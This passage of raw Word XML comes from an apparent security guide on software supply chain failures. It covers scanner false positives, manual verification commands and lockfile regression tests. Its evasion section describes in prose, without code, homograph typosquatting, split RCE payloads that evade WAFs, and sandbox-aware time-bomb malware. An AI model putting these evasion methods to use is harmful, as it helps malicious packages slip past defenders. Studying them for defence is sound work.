        <w:t xml:space="preserve"> Log4Shell highlighted the core danger of software supply chain failures: a single flaw in an obscure, open-source utility library can instantly compromise the security posture of the entire global internet economy, illustrating that organizations are only as secure as the unexamined third-party code they inherit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054B2013" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Advanced Detection &amp; False Positives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1A21F7" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>1. The False Positive Problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B95C8E3"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Automated vulnerability scanners (like SCA or container analyzers) operate largely on static comparisons—matching dependency lists against vulnerability catalogs. Because they look at software packages abstractly, they frequently suffer from alert fatigue due to false positives in the software supply chain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C48833A"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Common False Positive Scenarios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DF5550" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>The "Unreachable Code" Context (CWE-1395):</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> An SCA scanner correctly identifies that a specific version of a third-party library (e.g., a massive utility framework like Guava or Apache Commons) contains a severe CVE. However, the application code only imports and uses a single, completely unrelated math utility function from that library. Because the vulnerable module within the dependency is never instantiated, compiled, or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D8A0AD"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reachable during execution, the alert is technically a false positive for that specific deployment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F98D2AE" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>DevOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Dependencies Leaking into Production:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Scanners</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> parse build manifests (like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>package.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>pom.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ) and flag known vulnerabilities in development tools, test runners, or documentation builders (e.g., an outdated testing framework like Jest or JUnit). If these dependencies are strictly scrubbed during production multi-stage Docker builds, they pose zero runtime risk, yet the scanner flags them because they remain in the source manifest.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D74223" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Backported OS Patches:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Container image vulnerability scanners look at the raw version string of an operating system package (e.g., a Debian or RedHat library). Security teams or upstream maintainers often "backport" security patches to older version numbers to maintain stability. The scanner sees the old version number and flags a vulnerability that has actually already been patched by the OS vendor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31112C41"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Manual Verification Techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADB96E5"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To save engineering cycles, security analysts manually verify supply chain findings using targeted validation techniques:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5538D4DD" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Static Call-Graph Analysis:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> If an SCA tool flags a nested vulnerability, run a dependency tree trace (e.g., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve"> ls [package-name]</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>mvn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>dependency:tree</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ) to map the exact lineage. Use IDE tools or code search utilities to determine if the vulnerable component's classes or methods are ever actively called by the parent application logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004AFDED" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Runtime Attestation &amp; Image Verification:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Interrogate the production container directly rather than the source repository. Executing commands inside a test instance of the container (e.g., verifying installed OS packages via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>dpkg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve"> -l</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>rpm -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>qa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ) confirms whether a flagged operating system component was successfully stripped out during the production build phase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FC2631" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>2. Evasion Techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F520F5F"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When advanced threat actors exploit supply chain vulnerabilities or inject malicious payloads into open-source components, they must bypass Web Application Firewalls (WAFs) and Runtime Application Self-Protection (RASP) mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A24BB7B"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 xml:space="preserve">Dependency </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Typosquatting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp; Unicode Homograph Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E391CD9"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 xml:space="preserve">Instead of attempting to sneak a payload past a perimeter defense, attackers disguise the origin of the library entirely. They register packages using names that look identical to trusted libraries but utilize </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>lookalike Unicode characters</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (CWE-1104). For example, replacing a Latin </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> with a Cyrillic </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> . To a developer or a basic automated scanner reading the manifest, the string appears</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30148F65"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completely normal, allowing the malicious component to be ingested without triggering an untrusted package alert.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCDD203"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Polyglot &amp; Multi-Layer Payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FE7909"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Supply chain malware often hides its true intent by dividing the exploit execution into separate, benign-looking pieces that a WAF or static analyzer cannot piece together out of context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E760DBB" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>The Vector:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> An attacker splits a remote code execution payload into three individual strings spread across an image metadata tag, a setup script parameter, and a localized environment configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F9B95F" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>The Evasion:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Each isolated component looks like standard, low-risk data. The WAF clears all three requests. However, once ingested by the application, the vulnerable </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>thirdparty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> library merges the parameters natively, reassembling the exploit payload behind the defensive line.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34491D7F"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Time-Bombing &amp; Environmental Hiding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FD5C83" w14:textId="2D153E7B" w:rsidR="00D66BA1" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Advanced supply chain worms delay execution to evade dynamic sandbox detection. When a package is pushed to a public registry, automated registry scanners immediately spin it up in a sandbox environment for 5–10 minutes to watch for malicious behavior. Attackers write their payloads to actively check for sandbox indicators:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230AAEC1" w14:textId="734CA898" w:rsidR="002A3998" w:rsidRPr="0083079C" w:rsidRDefault="002A3998" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EECC1C8" wp14:editId="3BD30B85">
            <wp:extent cx="5942857" cy="3247619"/>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2857" cy="3247619"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D30373"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By checking if system uptime is under an hour, verifying if a mouse movement exists, or ensuring the execution environment is not tied to a known cloud provider's registry testing block, the malware acts completely benign during initial evaluation. Once deployed into a live</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F384858"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corporate production environment for 24 hours, the time-bomb triggers, activating the malicious code long after the automated security checks have passed it as safe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3C0B37" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Verification &amp; Compliance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0387467A" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>1. Fix Verification: Test Cases &amp; Regression Automation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A775C8"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Validating a fix for a Software Supply Chain Failure requires moving beyond standard local code tests to verifying the integrity and lineage of the entire dependency pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5E7416"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Automated Unit &amp; Integration Test Cases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389868B4" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Dependency Tree Invariant Assertions:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Write a build-time integration test that enforces a strict schema match on your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>lockfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>package-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>lock.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>poetry.lock</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>go.sum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ). The test should automatically fail the build if any new unapproved third-party package or unexpected transitive dependency version is </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>introduced without a corresponding update to an approved dependency manifest ledger.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F58CD8" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
